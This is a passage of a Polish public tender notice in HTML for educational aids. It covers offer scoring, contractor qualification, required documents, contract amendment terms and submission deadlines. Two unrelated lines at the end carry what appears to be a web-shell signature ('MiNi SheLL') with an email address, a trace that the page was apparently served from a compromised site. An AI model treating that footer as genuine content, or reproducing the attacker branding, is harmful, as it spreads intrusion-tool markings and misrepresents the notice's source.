(G) będzie rozpatrywane na podstawie okresu udzielonej gwarancji na wszystkie pomoce dydaktyczne, wymienione w przedmiocie zamówienia przez Wykonawcę w ofercie. <br/>Zamawiający wymaga podania okresu w pełnych miesiącach, przy czym okres ten nie może być krótszy niż 24 miesiące. Wskazanie okresu krótszego spowoduje odrzucenie oferty. Okres dłuższy niż 48 miesięcy dla potrzeb obliczenia punktacji będzie traktowany jako 48 miesięcy gwarancji. Niepodanie w ofercie okresu będzie traktowane jako zaoferowanie 24 miesięcy gwarancji.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/>G = Go / Gmax x 30 pkt.<br/>gdzie: Gmax – najdłuższy okres wśród badanych ofert<br/> Go – okres w ofercie ocenianej<br/><br/>4. Kryterium termin realizacji przedmiotu zamówienia (T): 10 pkt.<br/>Oferta może otrzymać maksymalnie 10 punktów jeżeli Wykonawca zaoferuje wykonanie zamówienia w terminie krótszym od wymaganych maksymalnie 45 dni kalendarzowych od dnia podpisania umowy, przyznawanych w następujący sposób:<br/>a) Wykonanie zamówienia w ciągu 45 dni - 0 pkt.<br/>b) Wykonanie zamówienia w ciągu 40dni – 5 pkt.<br/>c) Wykonanie zamówienia w ciągu 35dni, lub krótszym – 10 pkt.<br/>Zaoferowanie terminu dłuższego niż 45 dni spowoduje odrzucenie oferty.<br/><br/>Zamawiający dokona wyboru oferty tego z Wykonawców, która uzyska w wyniku oceny najwyższą liczbę punktów. Przyznanie punków poszczególnym ofertom odbędzie się w oparciu o następujący wzór:<br/>Ocena oferty = C+G+T<br/>Obliczenia będą dokonane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> V.	WARUNKI UDZIAŁU W POSTĘPOWANIU<br/>1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/>1)	zdolność do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/> Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>	Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej<br/>Dla części I i II:<br/>a) Zamawiający wymaga wykazania przez Wykonawcę, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał dwie dostawy pomocy dydaktycznych lub/i dwie dostawy sprzętu komputerowego na łączną kwotę minimum 40 000,00 zł brutto.<br/><br/>Wykonawca powinien wykazać spełnienie warunku udziału w postępowaniu dla każdej części z osobna, na którą składa ofertę. Tym samym jeśli Wykonawca będzie składał ofertę na wszystkie części, powinien w sumie wykazać się 4 dostawami na łączną kwotę minimum 80 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Podmiotowe środki dowodowe składane w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/><br/>a)	Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/><br/>2)	Podmiotowe środki dowodowe podmiotów zagranicznych w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu:<br/><br/>Lp	Wymagany podmiotowy środek dowodowy<br/>a)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w Roz VIII pkt. 2 ppkt. 1) lit. a) SWZ - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa wyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Terminy wystawienia ww. dokumentów stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz dostaw wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wraz z podaniem wartości, podmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów-oświadczenie wykonawcy, zgodnie z załącznikiem nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>4.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 3, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1)	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)	sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje dostawy, których wskazane zdolności dotyczą.<br/>5.	Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>6.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale VIII pkt. 1 (Załącznik nr 2 do SWZ), także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>7.	Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>8.	Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>9.	Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>10.	Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa Rozdziale VIII pkt. 1. Dokument ten potwierdza brak podstaw wykluczenia z postępowania w zakresie, w którym Wykonawca zobowiązany jest wykazać brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2.	Podmiotowe środki dowodowe, dotyczące braku podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Podmiotowe środki dowodowe dotyczące spełniania warunków udziału w postępowaniu składa odpowiednio Wykonawca/Wykonawcy wykazujący spełnienie warunku na zasadach określonych w Rozdziale V SWZ.<br/>3.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo do pełnienia takiej funkcji, udzielone zgodnie z wymogami ustawowymi, powinno być opatrzone kwalifikowanym podpisem elektronicznym.<br/>4.	Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Na podstawie art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość następujących zmian Umowy: <br/>1)	zmiana terminu wykonania Przedmiotu Umowy odpowiadająca okresowi przerwy w wykonaniu Umowy z powodu działania siły wyższej lub opóźnienia w wykonaniu Umowy z tego powodu – przez siłę wyższą rozumie się zdarzenie niezależne od Wykonawcy, niewynikające z jego problemów organizacyjnych, którego Strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogły przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej Umowy; Strony uznają za siłę wyższą, w szczególności następujące zdarzenia:<br/>a)	epidemia, huragany, powodzie, trzęsienie ziemi i inne zdarzenia stanowiące efekt działań elementarnych sił przyrody,<br/>b)	bunty, niepokoje, strajki, blokady dróg, wojna, wypadek, stan wyjątkowy. <br/>2)	zmiana Towaru wchodzącego w zakres Przedmiotu Umowy - gdy Towar stanowiący przedmiot zamówienia przestał być dostępny na rynku (np. wyczerpanie zapasów, zaprzestanie jego produkcji, zmiana zasad licencjonowania). Wykonawca powinien zaoferować sprzęt lub oprogramowanie o funkcjonalności i parametrach tożsamych lub lepszych w stosunku do pierwotnie oferowanego sprzętu lub oprogramowania. Warunki dostaw, świadczenia usług (w tym gwarancyjnych) pozostają bez zmian z zastrzeżeniem postanowień niniejszego paragrafu. Taka zmiana nie może powodować zwiększenia kwoty wynagrodzenia Wykonawcy, wskazanej w § 4 ust. 1 umowy.<br/>3)	zmiana terminu wykonania Umowy o czas niezbędny na dostarczenie zmienionego towaru w okolicznościach, o których mowa w pkt 2) powyżej <br/>4)	w przypadku udokumentowanych działań osób, podmiotów trzecich (niezwiązanych z żadną ze Stron) lub organów władzy publicznej, które spowodują przerwanie lub opóźnienie realizacji Przedmiotu Umowy w całości bądź w istotnym zakresie – w przypadku, jeśli działania osób, podmiotów trzecich lub organów władzy publicznej wpływają na możliwość wykonywania istotnej części lub całości Przedmiotu Umowy – odpowiednia, zmiana terminu realizacji Przedmiotu Umowy o czas przestoju.<br/>5)	w przypadku, gdy okoliczności związane z występowaniem na terenie Rzeczypospolitej Polskiej stanu zagrożenia epidemicznego lub epidemii w związku z zakażeniami wirusem SARS-CoV-2 uniemożliwią lub będą wiązać się ze znacznym ryzykiem braku możliwości prawidłowej realizacji Przedmiotu Umowy – odpowiednia, odpowiadająca tym okolicznościom zmiana zakresu Przedmiotu Umowy i/lub zmiana wynagrodzenia Wykonawcy i/lub zmiana terminu wykonania Przedmiotu Umowy o czas niezbędny na umożliwienie prawidłowej realizacji Przedmiotu umowy.<br/>2.	Wszystkie powyższe postanowienia, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jeżeli Wykonawca wykaże we wniosku o zmianę, wpływ danego czynnika na realizację Przedmiotu zamówienia. Zamawiający wyraża zgodę na zmianę Umowy w przypadku wskazanym w 15r ust. 4 ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz.U.2021.2095 t.j. z dnia 2021.11.22).<br/>3.	Wykonawca oświadcza, iż jest mu znana regulacja art. 15 r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz.U.2021.2095 t.j. z dnia 2021.11.22) dotycząca obowiązków informacyjnych i trybu wnioskowania o zmianę Umowy w związku z wpływem COVID-19 na wykonanie Umowy. <br/>4.	Nie stanowi zmiany Umowy:<br/>1)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy;<br/>2)	zmiana danych teleadresowych, zmiana osób wskazanych do wykonywania zakresu Umowy lub kontaktów między Stronami.<br/>5.	Wszelkie zmiany i uzupełnienia treści Umowy wymagają formy pisemnej w postaci aneksu podpisanego przez obie Strony pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com